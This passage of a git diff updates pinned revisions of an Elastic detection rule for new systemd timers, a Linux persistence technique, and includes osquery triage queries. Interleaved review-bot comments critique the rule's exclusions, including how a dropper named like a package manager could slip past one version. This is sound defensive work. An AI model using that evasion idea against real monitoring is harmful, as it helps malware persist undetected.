of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n 
datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", 
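Review bot: The first osquery listing in the `note` hardcodes `path LIKE '/home/user/.config/systemd/user/%'` while the query immediately after it uses the `{{user.name}}` placeholder, so on any host without a literal `user` account the first query silently misses per-user timer directories; change it to `path LIKE '/home/{{user.name}}/.config/systemd/user/%'` so both listings agree. The `process.executable` exclusion lists `/bin/rpm` but not `/usr/bin/rpm`; on merged-`/usr` distributions the executable path may be reported as the latter, so confirm against real events before relying on this exclusion for false-positive suppression. Since `_3.json` is a frozen rule version and this hunk only re-escapes `>`, both fixes belong in the rule source and the next version rather than in this snapshot.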
@@ -69,7 +69,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json
index fae519b49f7..67da5e2f11c 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_4.json
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. 
\n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n 
datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/proc/self/exe\" or \"/usr/sbin/dockerd\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", 
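Review bot: The "Osquery - Retrieve File Listing Information" query on the new side of this hunk still hard-codes `path LIKE '/home/user/.config/systemd/user/%'`, while the sibling "Additional File Listing" query and the rule's own `file.path` clause use `{{user.name}}` / `/home/*`, so on any host whose account is not literally `user` the guide silently skips the user-level timer directory the rule just alerted on. Change that clause to `path LIKE '/home/{{user.name}}/.config/systemd/user/%'` (or `'/home/%/.config/systemd/user/%'` to sweep every home) so the investigation covers the same paths as the detection. Separately, the `"/proc/self/exe"` exclusion in the `query` deserves a comment: any process that re-executes itself through that link would present that path if the sensor records the execve target rather than the resolved binary, so the exclusion's safety depends on how `process.executable` is populated and is worth confirming before relying on it. This file appears to be a pinned historical revision (`_4`), so any correction belongs in the current rule version as well.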
@@ -69,7 +69,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json
index 2bd1b734cc0..ec1a4d7ef3e 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_5.json
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. 
\n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n 
datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", 
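Review bot: The exclusion in this revision's `query`, `not process.name : ("docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor")`, keys on the process basename alone, which is attacker-controlled: a dropper copied to `/tmp/dpkg` (or any binary named `executor`) that writes a `.timer` into the monitored directories is silently excluded. The `_4` revision of the same rule excluded by full `process.executable` path (`"/usr/bin/dpkg"`, `"/bin/rpm"`, ...), which an attacker cannot satisfy without write access to those system paths; if the name-based list was chosen for distro portability, consider pairing it with a path constraint such as `process.executable : (/usr/bin/* or /usr/sbin/* or /bin/* or /sbin/*)` so that the exclusion only applies to package managers running from system locations. The note's first osquery also still hard-codes `/home/user/.config/systemd/user/%` where the second uses `{{user.name}}`. This appears to be a pinned historical revision (`_5`), so the fix belongs in the current rule version rather than here.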
@@ -70,7 +70,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json
index cd91682e64e..5b75f815f85 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json
@@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' 